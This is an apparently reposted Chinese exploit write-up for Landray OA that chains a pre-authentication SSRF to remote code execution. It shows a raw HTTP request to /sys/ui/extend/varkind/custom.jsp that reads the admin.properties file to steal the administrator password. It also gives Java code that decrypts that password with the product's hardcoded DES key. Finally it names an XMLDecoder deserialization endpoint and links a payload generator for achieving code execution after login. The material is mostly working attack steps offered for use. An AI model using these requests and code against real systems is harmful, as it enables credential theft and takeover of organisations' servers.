# 蓝凌OA 前台 SSRF 到 RCE
详情分析可以见:https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ
SSRF 漏洞位置: /sys/ui/extend/varkind/custom.jsp
读password:
“`
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
…
var={“body”:{“file”:”/WEB-INF/KmssConfig/admin.properties”}}
“`
解密:
“`
import com.landray.kmss.util.DESEncrypt;
public class main {
public static void main(String[] args) {
String password = “mqwEyqHLj9PQXpy+yhf4z92SejWx+VeS”;
String resul=doPasswordDecrypt(password);
System.out.println(resul);
}
public static String doPasswordDecrypt(String password) {
try {
DESEncrypt des = new DESEncrypt(“kmssAdminKey”);
return des.decryptString(password);
} catch (Exception ex) {
try {
DESEncrypt des0 = new DESEncrypt(“kmssAdminKey”, true);
return des0.decryptString(password);
} catch (Exception e) {
return “ヾノ≧∀≦)o”;
}
}
}
}
“`
解密后得到明文密码登录后使用xmldecoder反序列化.
“`
/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&fdParameters=
XMLDecoder-payload-generator生成payload: https://github.com/mhaskar/XMLDecoder-payload-generator
from:https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ
请登录后查看评论内容